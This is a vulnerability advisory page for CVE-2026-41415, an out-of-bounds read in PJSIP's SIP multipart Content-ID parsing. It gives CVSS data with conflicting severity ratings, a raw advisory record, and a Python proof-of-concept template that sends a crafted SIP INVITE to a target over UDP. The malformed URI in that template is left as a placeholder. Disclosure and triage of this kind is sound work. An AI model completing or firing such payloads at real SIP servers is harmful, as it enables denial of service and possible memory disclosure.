Security Vulnerability Report
CVE-2026-41415 CVSS 9.1 CRITICAL

CVE-2026-41415

Published: 2026-04-24 19:17:13
Last Modified: 2026-04-28 18:30:55

Description

PJSIP is a free and open source multimedia communication library written in C. In versions 2.16 and earlier, there is an out-of-bounds read when parsing a malformed Content-ID URI in a SIP multipart message body. Insufficient length validation can cause reads beyond the intended buffer bounds. This vulnerability is fixed in 2.17.

CVSS Details

CVSS Score
9.1
Severity
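CRITICAL (CVSS 3.1, from the record's Primary source; the raw record below also carries a Secondary CVSS 4.0 assessment of 6.7 MEDIUM that rates confidentiality impact as none, so the two ratings disagree on whether data can be disclosed)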
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:teluu:pjsip:*:*:*:*:*:*:*:* - VULNERABLE
PJSIP <= 2.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
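# PoC template for CVE-2026-41415 (PJSIP out-of-bounds read, CWE-125).
#
# What it does: builds one SIP INVITE with a multipart/mixed body and sends it
# as a single UDP datagram to target_ip:target_port. No reply is read.
#
# What it does not do: the Content-ID value below is a literal placeholder, so
# this listing is a message skeleton rather than a validated reproducer. A
# target that keeps running after receiving it says nothing about exposure.
#
# For triage, the dependable check is the deployed PJSIP version: the advisory
# lists 2.16 and earlier as affected and 2.17 as the first fixed release. The
# patch commit and vendor advisory URLs are in the page's raw JSON record.
import socket

# Both values are placeholders taken from the page; 5060 is the default SIP port.
target_ip = "TARGET_IP"
target_port = 5060

# Header values are reproduced exactly as printed on the page.
# NOTE(review): "[email protected]" looks like residue of the hosting site's
# e-mail obfuscation, not the author's original From/Call-ID/Contact values;
# the originals cannot be recovered from this page.
payload = (
    "INVITE sip:100@{target_ip} SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK-12345\r\n"
    "Max-Forwards: 70\r\n"
    "To: <sip:100@{target_ip}>\r\n"
    "From: <sip:[email protected]>;tag=12345\r\n"
    "Call-ID: [email protected]\r\n"
    "CSeq: 1 INVITE\r\n"
    "Contact: <sip:[email protected]>\r\n"
    "Content-Type: multipart/mixed; boundary=boundary123\r\n"
    "Content-Length: 200\r\n"
    "\r\n"
    "--boundary123\r\n"
    "Content-Type: application/sdp\r\n"
    # Placeholder only: the page does not give the malformed URI itself.
    "Content-ID: <[MALFORMED_URI_TRIGGERING_OOB_READ]>\r\n"
    "\r\n"
    "v=0\r\no=- 0 0 IN IP4 0.0.0.0\r\ns=-\r\nc=IN IP4 0.0.0.0\r\nt=0 0\r\n"
    "--boundary123--\r\n"
).format(target_ip=target_ip)

try:
    print(f"[+] Sending PoC to {target_ip}:{target_port}...")
    # The context manager closes the UDP socket even when sendto() fails;
    # the original never closed it.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(payload.encode(), (target_ip, target_port))
    print("[+] Payload sent. Check if the target crashes or exhibits behavior.")
except OSError as e:
    # Name-resolution and send failures are OSError subclasses; anything else
    # is a programming error and should surface instead of being swallowed.
    print(f"[-] Error: {e}")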

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41415", "sourceIdentifier": "[email protected]", "published": "2026-04-24T19:17:13.170", "lastModified": "2026-04-28T18:30:54.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PJSIP is a free and open source multimedia communication library written in C. In 2.16 and earlier, there is an out-of-bounds read when parsing a malformed Content-ID URI in SIP multipart message body. Insufficient length validation can cause reads beyond the intended buffer bounds. This vulnerability is fixed in 2.17."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:teluu:pjsip:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.17", "matchCriteriaId": "3CEC20D0-E450-41AD-BCF9-4E407594F2A7"}]}]}], "references": [{"url": "https://github.com/pjsip/pjproject/commit/4225a93c16661538005017883fbc8f1ea1d5f4b0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pjsip/pjproject/security/advisories/GHSA-935m-fmf5-j4pm", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}